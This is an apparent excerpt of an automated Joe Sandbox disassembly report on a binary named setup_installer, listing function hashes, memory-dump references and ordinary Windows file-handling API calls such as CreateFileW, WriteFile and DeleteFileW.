                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 264148019a1cdb291cfcf2f50279c9645f2db8245b07abc43ab4fb8d1ae2bb0f
                                        • Instruction ID: 38aad06e79cda41a368b4c7dfbcb60c19aab280267c900351c7127d69cc129a5
                                        • Opcode Fuzzy Hash: 264148019a1cdb291cfcf2f50279c9645f2db8245b07abc43ab4fb8d1ae2bb0f
                                        • Instruction Fuzzy Hash: 98E09272C400049AC704FB55E852AECB778EF61319F10407FE412731D18B3C1F08CA58
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00409498
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040950A: __EH_prolog.LIBCMT ref: 0040950F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        • Opcode ID: 4b528696f59aab3bcf5807e590b472d617c9c4ff83b05d653dc8ecc22c59f10d
                                        • Instruction ID: 228697bc30b66583063671ae9736afe559f4e6309b613c1622b7ba624724d52c
                                        • Opcode Fuzzy Hash: 4b528696f59aab3bcf5807e590b472d617c9c4ff83b05d653dc8ecc22c59f10d
                                        • Instruction Fuzzy Hash: 6FE09272B00655AFCB08EF69D80669D76E49B09324F00823FE026F22C2DF784E00865C
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 556981a7186a9669ba3390ac916edf3df05c09ea9c5c3581f725f413cec59042
                                        • Instruction ID: a9dd8ae4a789225e50b84d489bf84e0c6a5884a04ef7bcfbc1ff797b67dd35a1
                                        • Opcode Fuzzy Hash: 556981a7186a9669ba3390ac916edf3df05c09ea9c5c3581f725f413cec59042
                                        • Instruction Fuzzy Hash: 17F017B1921B54DBD724DF54D1047DABBF4FF14319F00891ED09653681DBB86988CB98
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040C9AB
                                          • Part of subcall function 0040CF16: __EH_prolog.LIBCMT ref: 0040CF1B
                                          • Part of subcall function 0040CEC5: __EH_prolog.LIBCMT ref: 0040CECA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 60b1df6c3d2834dbf76d900981a7432336127acb7126d7a06376be963e88a761
                                        • Instruction ID: 26fffc1e8155d05b72e6de97fa5396bbbae1cf3f6b56db7a32a7b9711ce441f4
                                        • Opcode Fuzzy Hash: 60b1df6c3d2834dbf76d900981a7432336127acb7126d7a06376be963e88a761
                                        • Instruction Fuzzy Hash: 78E0E571900664DADB08EB58C4523DCB760EB05328F00436EA853B32C1CBB82B00C689
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 22b65b6785276599533fcaba3636d19bbd4ba6f6a0a11f096905abfa694f3633
                                        • Instruction ID: 924b7e828e2619065f90ec1c606901b0d7d869b936ff608bc391d1a571cd581b
                                        • Opcode Fuzzy Hash: 22b65b6785276599533fcaba3636d19bbd4ba6f6a0a11f096905abfa694f3633
                                        • Instruction Fuzzy Hash: 8AE0ED76614104EFC704EF99D855F9EB7B8EF49354F10846EF40A97281C7799900CA68
                                        APIs
                                          • Part of subcall function 00405298: FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3
                                        • CreateFileW.KERNELBASE(?,?,00000000,00000000,?,0041B558,00000000,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0), ref: 00405281
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ChangeCloseCreateFileFindNotification
                                        • String ID:
                                        • API String ID: 727422849-0
                                        • Opcode ID: 9807379ff81c3d490cf68a83d96df0eb8ecc633cde6dd9f935d588c58eaabe44
                                        • Instruction ID: d556d6ed1a1370b11f352619dc192e4bd69da4566a87ece580b0bc5f49a6e668
                                        • Opcode Fuzzy Hash: 9807379ff81c3d490cf68a83d96df0eb8ecc633cde6dd9f935d588c58eaabe44
                                        • Instruction Fuzzy Hash: D0E04F360002196BCF115F64AC01BCE3B95EF19360F14452ABA24A62E0C7728461AF94
                                        APIs
                                          • Part of subcall function 00404DA0: GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1
                                        • DeleteFileW.KERNELBASE(?,?,0040479E,?,?,?,0000005C,?,?,75C50B80,?,00000000), ref: 0040466B
                                          • Part of subcall function 00404462: SetFileAttributesW.KERNELBASE(?,00000000,004047EE,?,75C50B80,?,00000000), ref: 00404464
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: File$Attributes$Delete
                                        • String ID:
                                        • API String ID: 3735447641-0
                                        • Opcode ID: 4af3f9c4ac87f317a383e19ebbf4be1568d8f498abffe729fc2456daa46237b6
                                        • Instruction ID: c98f3abb563ab1bb48d32cbdf2bd3b216670aee835f997c4b583ea26d8f2b8e7
                                        • Opcode Fuzzy Hash: 4af3f9c4ac87f317a383e19ebbf4be1568d8f498abffe729fc2456daa46237b6
                                        • Instruction Fuzzy Hash: 50D02B61101120018DE0297C38057DB12050ED33347148B77FEA0F23D1EB7E8C83009C
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004054F0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 8754c39352e6b572958dd94eb4906f8bfe997afb7bdf6dd0c5210f13dd38fcb2
                                        • Instruction ID: 32868f3a29a398ab14785254ccb1bf50569d93ec041cad7fd8186f98d882653d
                                        • Opcode Fuzzy Hash: 8754c39352e6b572958dd94eb4906f8bfe997afb7bdf6dd0c5210f13dd38fcb2
                                        • Instruction Fuzzy Hash: B7E0E579600208FFCB11CF95C801BCE7BFAEB08355F20C069F9189A260D339AA55DF58
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00408113
                                          • Part of subcall function 0040814D: __EH_prolog.LIBCMT ref: 00408152
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 9eca010d204422902fe07f867e60df36874e4cd661f802f806a107c05fca104b
                                        • Instruction ID: 0ca9ab5b8f1d60bd9c73bc96d98377938e635d19cdb4d5b29e0664e23227e72b
                                        • Opcode Fuzzy Hash: 9eca010d204422902fe07f867e60df36874e4cd661f802f806a107c05fca104b
                                        • Instruction Fuzzy Hash: 9AD01271950208EBD7149B49E902BDEB778EB41758F10452FF00165180C7B95A008669
                                        APIs
                                        • ReadFile.KERNELBASE(000000FF,?,?,00000000,00000000,000000FF,?,0040540C,?,?,00000000,?,00405432,?,?,00000000), ref: 004053D7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 7680b6ca8a144e951c888a795149d2d53928818e18071b104f126b41f4adbd68
                                        • Instruction ID: bc519ebe3b5b6386e9621bf61f3413b29384c9a634b5b939dab0404262013cc0
                                        • Opcode Fuzzy Hash: 7680b6ca8a144e951c888a795149d2d53928818e18071b104f126b41f4adbd68
                                        • Instruction Fuzzy Hash: 76E0EC75200208FBCB01CF90CC01FCE7BB9FB49754F20C058E91596160D375AA14EB54
                                        APIs
                                        • FindNextFileW.KERNELBASE(000000FF,?), ref: 00404C00
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileFindNext
                                        • String ID:
                                        • API String ID: 2029273394-0
                                        • Opcode ID: c4609d8de41ccdaab4e1c7bc9efeac1eeb3cd6958e8da37b1abb75d29d41c6c1
                                        • Instruction ID: 6514850b34d96ac27011973a87a4576330e77776678e8d48275e438d2eb40076
                                        • Opcode Fuzzy Hash: c4609d8de41ccdaab4e1c7bc9efeac1eeb3cd6958e8da37b1abb75d29d41c6c1
                                        • Instruction Fuzzy Hash: FBD05B701041189BDB10DF60CC499AB777CABD1349F1040759A05E71A0D639D949DBAD
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(00000000), ref: 00405C97
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        • Opcode ID: 4d6a3bc29c4e390f2d881286ea22dbfc82941a5c247174d0c814fe88def5afb7
                                        • Instruction ID: 8a65c2bcff2eca5891eeae4c2ed1ae8bad21f8dc9d753916ad51b3c6ea8577c2
                                        • Opcode Fuzzy Hash: 4d6a3bc29c4e390f2d881286ea22dbfc82941a5c247174d0c814fe88def5afb7
                                        • Instruction Fuzzy Hash: EAD05E305187528AE3A09F65F80878367E0EF40710B21C82EE488C6320F3B488808784
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00410E78
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040DCA3: __EH_prolog.LIBCMT ref: 0040DCA8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        • Opcode ID: bd17aa57d55e5f7ba60f60e0126942ef50211aff7d8658aad84ef683687c9bb7
                                        • Instruction ID: cba1e8ea3cc59bc4478667252af174c53adf0a6d33d98c46e50d2fdcf3a083dd
                                        • Opcode Fuzzy Hash: bd17aa57d55e5f7ba60f60e0126942ef50211aff7d8658aad84ef683687c9bb7
                                        • Instruction Fuzzy Hash: 81D05E71F042849BCB08FFF994227AD76A0AB48348F00853FE012E67C0DFB85A808A19
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: a70d0e270c00220fc0e1caf0f16e22cd4a5fb1ec1f3136ff0860332eb57d27a1
                                        • Instruction ID: 0e5df7a028251fcaba9f82fb0a08b03a75193d26b760c08bd3ff78e88b2aa95c
                                        • Opcode Fuzzy Hash: a70d0e270c00220fc0e1caf0f16e22cd4a5fb1ec1f3136ff0860332eb57d27a1
                                        • Instruction Fuzzy Hash: 46D0C93110556146DE646E3C78449C337999E0633432147AAF4B0E62E1D3748C835E94
                                        APIs
                                        • FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 2e7c38b74275a1d10db6fabc292f24c9b7c881a734d2f7bbb3c64b0cccd58694
                                        • Instruction ID: b412e42f3085da2f257a58cf6b4c1cc416868627b9fbf021317bc8eabdf38f56
                                        • Opcode Fuzzy Hash: 2e7c38b74275a1d10db6fabc292f24c9b7c881a734d2f7bbb3c64b0cccd58694
                                        • Instruction Fuzzy Hash: F4D0127150412147CA742E3CB845AC377E85A86330325176BF6B0E32E4D374DC834694
                                        APIs
                                        • SetFileTime.KERNELBASE(?,?,?,?,004054CA,00000000,00000000,?,00402482,?), ref: 004054AE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        • Opcode ID: d00ba419ea0ae4e6e6213418fd014f6d5999ef0473a0d56b55522c41bf13b527
                                        • Instruction ID: 1917584adf27ce0176f88e11aa52cbd2cdf9234270b8d6b477bb5c626fe98c97
                                        • Opcode Fuzzy Hash: d00ba419ea0ae4e6e6213418fd014f6d5999ef0473a0d56b55522c41bf13b527
                                        • Instruction Fuzzy Hash: 56C04C36158205FF8F020F70CC04C1ABFE2EB99311F10C918B169C4070C7328024EB02
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,00401490,?,00000001,?,00419240,?,0041B524,;!@InstallEnd@!,?,0041B558,?,00000000,?,?,00000000), ref: 00404827
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: d57684e69020114d10183d2ca0050567171a42a80b8fd26bd4e5665bc9280296
                                        • Instruction ID: fec01ce8eb217bf0cfbecdd44f93909942d88e708ff386734e9f039800b2ffe1
                                        • Opcode Fuzzy Hash: d57684e69020114d10183d2ca0050567171a42a80b8fd26bd4e5665bc9280296
                                        • Instruction Fuzzy Hash: CCA002B07F511B468E241B34DD0986A39549555A037115B687157C50D4DF25C1045554
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,004047EE,?,75C50B80,?,00000000), ref: 00404464
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: ed25a719a3732e43e41dd9887838c0a6c9a1d2c5f1583ac5206a53767c946853
                                        • Instruction ID: 98a8bcf7e5ee3235dfc47f65db57e9ddc409942bd55006f53268cdc163f6fd1c
                                        • Opcode Fuzzy Hash: ed25a719a3732e43e41dd9887838c0a6c9a1d2c5f1583ac5206a53767c946853
                                        • Instruction Fuzzy Hash: 02A002A02112099FA6145B315E09B6F29ADEDC9AD1745C96C7415C5060EB29C8509565
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CreateDirectory
                                        • String ID:
                                        • API String ID: 4241100979-0
                                        • Opcode ID: 083f4dbc4f2943f1dfb74f92bb0e451d38530cc52b4985dcc65b559a9f8fdd7c
                                        • Instruction ID: 34323f3862c9c6fd2d35131ea61d74e0925f70aef560595d1f96e53f70211f96
                                        • Opcode Fuzzy Hash: 083f4dbc4f2943f1dfb74f92bb0e451d38530cc52b4985dcc65b559a9f8fdd7c
                                        • Instruction Fuzzy Hash: 70A0223030030083E2200B300E0AB0F280CAF08AC0F00C0283208C80E0EB28C0200008
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 81aac6498f9a46e99a08266c3e76ab7939904c505e4d4e367c054e885d8591d5
                                        • Instruction ID: 591aceaef49bad6d6e0eb818f5c395ad730c6046851bbff497a631cd11e1eb05
                                        • Opcode Fuzzy Hash: 81aac6498f9a46e99a08266c3e76ab7939904c505e4d4e367c054e885d8591d5
                                        • Instruction Fuzzy Hash: 07A011A0820000828A2003302C8808A2A808882332B208B20E230C00E0CB38C800A2A8
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?), ref: 00406776
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 663c19575a8456751b998b43a00a15bb72bda6945b96a8155ca3274f1c07a7d2
                                        • Instruction ID: a9f0ad8659e0c22b9764d8725ef8c1a002e24048339c74b3f33957f6e1008843
                                        • Opcode Fuzzy Hash: 663c19575a8456751b998b43a00a15bb72bda6945b96a8155ca3274f1c07a7d2
                                        • Instruction Fuzzy Hash: E6F03C392002069BDF249F64DC009BB77A9EF45318B11453AAC17EB294D37AE8219BA9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
